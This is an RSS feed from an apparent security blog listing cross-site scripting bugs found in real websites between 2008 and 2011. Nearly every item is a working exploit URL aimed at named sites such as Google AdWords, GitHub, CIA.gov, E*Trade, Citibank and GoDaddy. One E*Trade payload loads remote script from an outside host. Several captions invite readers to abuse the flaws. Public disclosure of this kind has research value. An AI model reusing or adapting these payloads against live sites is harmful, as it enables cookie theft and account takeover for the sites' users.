<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GerryEisenhaur.com &#187; xss</title>
	<atom:link href="http://www.gerryeisenhaur.com/tag/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.gerryeisenhaur.com</link>
	<description>relevant ramblings of an ethical hacker</description>
	<lastBuildDate>Thu, 07 Apr 2011 05:31:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Random XSS</title>
		<link>http://www.gerryeisenhaur.com/2011/01/04/random-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2011/01/04/random-xss/#comments</comments>
		<pubDate>Wed, 05 Jan 2011 02:12:18 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=165</guid>
		<description><![CDATA[I have a bad habit of saving these little random bugs and telling myself that I &#8216;may have a need for them later&#8217;. I think thats just the paranoid security guy in me, but then again I do the same for random little electronic parts I find. Given the fact I just cleaned out all [...]]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2011/01/04/random-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Adsense XSS</title>
		<link>http://www.gerryeisenhaur.com/2011/01/04/google-adsense-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2011/01/04/google-adsense-xss/#comments</comments>
		<pubDate>Wed, 05 Jan 2011 01:26:47 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=152</guid>
		<description><![CDATA[Not sure when this got reported or fixed, but I guess I missed the reward by a day. https://adwords.google.com/cm/CampaignMgmt?__u=1111111111&#038;__c=1111111111&#038;stylePrefOverride=2',0);alert(document.cookie)//]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2011/01/04/google-adsense-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>GitHub XSS</title>
		<link>http://www.gerryeisenhaur.com/2009/12/15/github-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2009/12/15/github-xss/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:29:58 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=104</guid>
		<description><![CDATA[http://github.com/search?q=python&#38;type=Everything&#38;repo='&#34;&#62;&#60;script&#62;alert(/pwned/)&#60;/script&#62;]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2009/12/15/github-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CIA.gov and Recovery.gov XSS</title>
		<link>http://www.gerryeisenhaur.com/2009/12/15/cia-gov-and-recovery-gov-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2009/12/15/cia-gov-and-recovery-gov-xss/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:24:37 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=99</guid>
		<description><![CDATA[https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/) http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=&#60;script&#62;alert('and pwned again')&#60;/script&#62;&#38;error=&#60;script&#62;alert('pwned')&#60;/script&#62;]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2009/12/15/cia-gov-and-recovery-gov-xss/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Fun with E*Trade</title>
		<link>http://www.gerryeisenhaur.com/2008/11/04/fun-with-etrade/</link>
		<comments>http://www.gerryeisenhaur.com/2008/11/04/fun-with-etrade/#comments</comments>
		<pubDate>Tue, 04 Nov 2008 19:21:43 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=53</guid>
		<description><![CDATA[Most of these require the user to be logged in, and for those who don&#8217;t know, the &#8216;expression&#8217; technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples. https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/)) https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/)) https://us.etrade.com/e/t/user/login?TYPE=&#038;REALMOID=&#038;GUID=&#038;SMAUTHREASON=0&#038;METHOD=GET&#038;SMAGENTNAME=&#038;TARGET=%22+style=%22width:expression(alert(/owned/)) https://global.etrade.com/e/t/intl/page?nav=3&#038;subnav=4&#038;screen=1%27;alert(/owned/);//&#038;language=en&#038;country=gl (nav and subnav are [...]]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2008/11/04/fun-with-etrade/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Technorati XSS</title>
		<link>http://www.gerryeisenhaur.com/2008/11/02/technorati-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2008/11/02/technorati-xss/#comments</comments>
		<pubDate>Sun, 02 Nov 2008 13:22:27 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=73</guid>
		<description><![CDATA[If anyone is interested, Technorati is full of bugs like this. http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.technorati.com/404please%27);alert(1);// http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E [POST]http://www.technorati.com/account/bio/?bio_blurb=&#038;company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&#038;zipcode=&#038;country=US&#038;func=updateuser]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2008/11/02/technorati-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>More StumbleUpon.com Bugs</title>
		<link>http://www.gerryeisenhaur.com/2008/11/01/more-stumbleuponcom-bugs/</link>
		<comments>http://www.gerryeisenhaur.com/2008/11/01/more-stumbleuponcom-bugs/#comments</comments>
		<pubDate>Sat, 01 Nov 2008 15:04:38 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=69</guid>
		<description><![CDATA[Free stumbles anyone? http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2008/11/01/more-stumbleuponcom-bugs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Citibank XSS</title>
		<link>http://www.gerryeisenhaur.com/2008/10/31/citibank-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2008/10/31/citibank-xss/#comments</comments>
		<pubDate>Fri, 31 Oct 2008 15:29:09 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=76</guid>
		<description><![CDATA[http://www.citibank.com/domain/contact/index.htm?_u=visitor&#038;_uid=&#038;_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2008/10/31/citibank-xss/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Godaddy.com XSS</title>
		<link>http://www.gerryeisenhaur.com/2008/10/30/godaddycom-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2008/10/30/godaddycom-xss/#comments</comments>
		<pubDate>Thu, 30 Oct 2008 22:07:47 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">https://www.hiredhacker.com/?p=51</guid>
		<description><![CDATA[Anyone want to take over a few domains? https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22 https://dcc.godaddy.com/default.aspx?activeview=transfer&#038;filtertype=3&#038;sa=%22+onerror%3d%27alert(1)%27+%22 https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1) It&#8217;s scary how full of holes godaddy.com is, this is just a sample of what I saw while I was transferring my domains to webfaction.]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2008/10/30/godaddycom-xss/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Mantis Bug Tracker XSS</title>
		<link>http://www.gerryeisenhaur.com/2008/03/01/mantis-bug-tracker-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2008/03/01/mantis-bug-tracker-xss/#comments</comments>
		<pubDate>Sat, 01 Mar 2008 21:52:15 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/2008/03/01/mantis-bug-tracker-xss/</guid>
		<description><![CDATA[&#8216;Mantis is a free popular web-based bugtracking system&#8217; &#8211; http://www.mantisbt.org/ I didn&#8217;t audit this, I don&#8217;t want to audit this, I just found it while using Mantis. There may be more, but this is what I got: /view_filters_page.php?for_screen=1&#38;target_field=show_category[]%22;alert(1);x=%22]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2008/03/01/mantis-bug-tracker-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

